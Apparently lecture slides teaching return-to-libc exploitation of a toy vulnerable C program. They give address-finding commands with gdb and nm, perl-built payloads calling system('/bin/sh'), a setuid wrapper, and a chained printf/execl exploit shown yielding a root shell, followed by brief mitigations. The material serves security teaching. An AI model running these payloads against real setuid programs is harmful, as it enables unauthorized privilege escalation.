Arc injection / Return to libc

• Stack overflows require an executable stack, and securer systems can use a non-executable stack.
  We need to get around this...



• Also, if the buffer isn't big enough for shell code, this provides a different opportunity.

• Libc: standard C library that contains useful functions such as printf(), execl(), and system().



• Vulnerable program, for example:

  vuln.c
  int main(int argc, char *argv[])
  {
      char buffer[5];
      strcpy(buffer, argv[1]);
      return 0;
  }

• system() takes a single argument and executes that argument with /bin/sh.
  In this case, we want to do system("/bin/sh") to get a shell.
  
  
• To use system(), we need to know where it is! Two methods:
  • ldd and nm:

    $ ldd vuln 
            linux-gate.so.1 =>  (0x00922000)
            libc.so.6 => /lib/libc.so.6 (0x00664000)
            /lib/ld-linux.so.2 (0x00646000)
    $ nm /lib/libc.so.6 | grep system
    00698e88 t do_system
    0069932b T __libc_system
    00751442 T svcerr_systemerr
    0069932b W system

  • gdb:

    $ gdb -q vuln
    (gdb) break main
    Breakpoint 1 at 0x804838a
    (gdb) run
    Starting program:
    ./vuln
    
    Breakpoint 1, 0x0804838a in main ()
    (gdb) p system
    $1 = {<text variable, no debug info>} 0x0069932b <system> <-- This is what we need!

• We need to supply arguments in the proper order:
  
  

  Function Address

  Return Address

  Argument 1

  ...

  Argument n

  
  In this case:
  • Function Address: System address we just found.
  • Return Address: Doesn't matter.
  • Argument: Pointer to /bin/sh - store this in an environment variable.
    

    $ export BINSH="/bin/sh"
    $ ./genv BINSH
    BINSH is located at 0xbfffff47

• Now we have the addresses of everything we need:
  • system(): 0x0069932b
  • BINSH: 0xbfffff47



• Crafting the buffer:
  1. Space before return address: We're just calling system, so we can fill this with garbage.
  2. Vuln's return address: Overwritten with the address of system().
  3. System() return address: Address that system() will return to. Right now, we don't care.
  4. System() function argument: Address of BINSH.



• Let perl help us out...

  $ ./vuln `perl -e 'print "ABCD"x7 . "\x2b\x93\x69\x00FAKE\x47\xff\xff\xbf";'`

  Note that the addresses are in reverse order thanks to little endian architecture.

• system() executes its arguments in /bin/sh, which drops privileges. This means no root shell for us.



• How can we avoid this? execl(path, argv[0], argv[1]...) will allow us to execute a convenient wrapper program such as:

  wrapper.c
  int main()
  {
      setuid(0);
      setgid(0);
      system("/bin/sh");
  }

• Our call: execl("./wrapper", "./wrapper", 0) should end up looking like:
  
  

  execl address

  some return address

  "/pathto/wrapper"

  "/pathto/wrapper"

  0

  
  

• Slight issue: execl() requires an argument list that is null terminated.
  
  This is a problem, because it will end our string early... so we need to chain multiple calls to libc.



• Another useful function: printf().
  • The %n parameter prints how many characters have been written so far to a location specified by the argument.
  • By using n$ inside a parameter, you can read the value of the nth argument.
  • Combining these, %3$n will write the number of characters printed so far to the address specified in the 3rd argument.
  • There will be more details in the Format Strings talk.



• As before, we'll use environment variables to store argument strings:
  • WRAPPER: "/pathto/wrapper"
  • FMTSTR: "%3$n"
  We can find the location of these variables just like before.



• So what we need is this:
  
  

  printf() address

  execl() address

  FMTSTR address

  WRAPPER address

  WRAPPER address

  address of this word

  
  
All that's left is to find the address of the last word - the address where we want to write NULL.

• We can just add debugging output to the vulnerable program's source code and recompile:

  vul2.c
  int main (int argc, char *argv[])
  {
      char buffer[5];
      printf("buffer is at %p\n", buffer);
      strcpy(buffer, argv[1]);
      return 0;
  }

• To get an accurate address, we need to simulate the actual buffer size:

  $ ./vul2 `perl -e 'print "ABCD"x13;'`
  buffer is at 0xbffff550

• Now we need to add to the buffer address to find the specific argument we're looking for.
  
  (7 long words of garbage + 5 argument long words) * 4 bytes in a long = 48 bytes

  0xbffff550 + 48 = 0xbffff580

• We now have everything we need to exploit!
  • printf(): 0x40083960
  • excel(): 0x400dc140
  • FMTSTR: 0xbffffedf
  • WRAPPER: 0xbffffc65
  • Null argument: 0xbffff580



• Our final exploit:

  $ ./vuln `perl -e 'print "ABCD"x7 . "\x60\x39\x08\x40" .
  "\x40\xc1\x0d\x40" . "\xdf\xfe\xff\xbf" . "\x65\xfc\xff\xbf" .
  "\x65\xfc\xff\xbf" . "\x80\xf5\xff\xbf";'`
  sh-2.05a# id
  uid=0(root) gid=0(root) groups=500(matrix)

• Randomized address space: If you don't know where things will be in memory, then you can't call them.



• Stack canary: This will prevent you from overwriting the return address of a function.